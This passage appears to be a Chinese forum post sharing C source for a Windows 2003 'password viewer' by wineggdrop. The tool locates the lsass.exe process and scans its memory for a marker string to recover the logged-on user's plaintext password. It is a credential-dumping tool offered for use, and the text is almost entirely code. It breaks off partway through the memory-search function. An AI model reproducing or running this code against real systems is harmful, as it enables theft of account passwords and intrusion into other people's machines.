用winhex读取xp和2003下的lsass进程的内存数据,可以读取当前登录用户的明文密码.
source code:
//********************************************************************************
// version: v1.0
// coder: wineggdrop
// date release: 12/15/2004
// purpose: to demonstrate searching logon user password on 2003 box,the method
// used is pretty unwise,but this may be the only way to review the
// logon user's password on windows 2003.
// test platform: windows 2003
// compiled on: vc++ 6.0
//********************************************************************************
#include <stdio.h>
#include <windows.h>
#include <tlhelp32.h>
#define baseaddress 0x002b5000 // fixed start address of the memory scan; per the author the password may sit below it or far above it, so a miss here proves nothing (see the note above search())
char password[max_path] = {0}; // output buffer for the bytes the scan treats as the password; zero-initialised so an unsuccessful scan leaves it empty (the writer is in findpassword()/search(), outside this view)
// function prototype declaration
//------------------------------------------------------------------------------------------------------
bool findpassword(dword pid);
int search(char *buffer,const uint nsize);
dword getlsasspid();
bool is2003();
//------------------------------------------------------------------------------------------------------
// end of function prototype declarations
int main()
{
    // Entry point. Refuses to run unless is2003() reports a 2003 host,
    // resolves the lsass.exe pid through getlsasspid(), and hands it to
    // findpassword(), which (per the global's comment) fills password[] as a
    // side effect. findpassword()'s return value is ignored, so exit status 0
    // does not mean a password was actually found.
    // From the defender's side: the only notable action is the read of
    // another process's (lsass.exe) memory inside findpassword(); that access
    // pattern, not this launcher, is what detection should key on.
    dword pid = 0;
    int rc = -1;

    printf("windows 2003 password viewer v1.0 by wineggdrop\n\n");

    if (is2003())
    {
        pid = getlsasspid(); // zero signals that lsass.exe could not be located
        if (pid != 0)
        {
            findpassword(pid);
            rc = 0;
        }
    }
    else
    {
        // message text kept verbatim; it reads "can't only" in the original
        printf("the program can't only run on windows 2003 platform\n");
    }

    return rc;
}
// end main()
//------------------------------------------------------------------------------------
// purpose: search the memory & try to get the password
// return type: int
// parameters:
// in: char *buffer --> the memory buffer to search
// out: const uint nsize --> the size of the memory buffer
// note: the program tries to locate the magic string "localsystem remote procedure",
// since the password is near the above location,but it's not always true that
// we will find the magic string,or even we find it,the password may be located
// at some other place. we are just trying our luck
//------------------------------------------------------------------------------------
int search(char *buffer,const uint nsize)
{
uint offset = 0;
uint i = 0;
uint j = 0 ;
uint count = 0;
if (buffer == null)
{
return -1;
}
for (i = 0 ; i < nsize ; i++)
{
/* the below is to find the magic string,why so complicated?that will thank ms.the separation from word to word
is not separated with a space,but with a ending character,so any search api like strstr() will fail to locate
the magic string,we have to do it manually and slowly
*/
if (buffer[i] == 'l')
{
off